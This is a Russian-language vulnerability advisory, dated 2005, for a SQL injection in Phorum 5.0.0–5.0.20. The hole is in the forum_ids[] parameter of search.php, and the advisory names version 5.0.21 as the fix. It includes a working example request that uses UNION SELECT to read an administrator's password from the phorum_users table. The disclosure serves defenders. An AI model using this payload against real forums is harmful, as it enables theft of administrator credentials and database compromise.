Security Lab

SQL-инъекция в Phorum

Дата публикации:08.11.2005
Дата изменения:17.10.2006
Всего просмотров:2173
Опасность:
Средняя
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Неавторизованное изменение данных
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: Phorum 5.x
Уязвимые версии: Phorum 5.0.0 – 5.0.20

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.

Уязвимость существует из-за недостаточной обработки входных данных в параметре “forum_ids[]” сценария “search.php”. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Пример:

http://localhost/phorum520/search.php?1,search=a,
page=1,match_type=ALL,match_dates=30,match_
forum=ALL,body=1,author=1,subject=1,&forum_ids[]=-99)
/**/UNION/**/ALL/**/SELECT/**/1,password,3,4,
5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,
25,26,27,28,29,30,21,32/**/FROM/**/phorum_users
/**/WHERE/**/admin=1/**/LIMIT/**/1/*

Для удачной эксплуатации уязвимости, опция register_globals должна быть включена.

URL производителя: phorum.org

Решение: Установите последнюю версию (5.0.21) с сайта производителя.
phorum.org/downloads/phorum-5.0.21.tar.gz

Источник:

Ссылки: Sql injection in Phorum 5.0.20 and earlier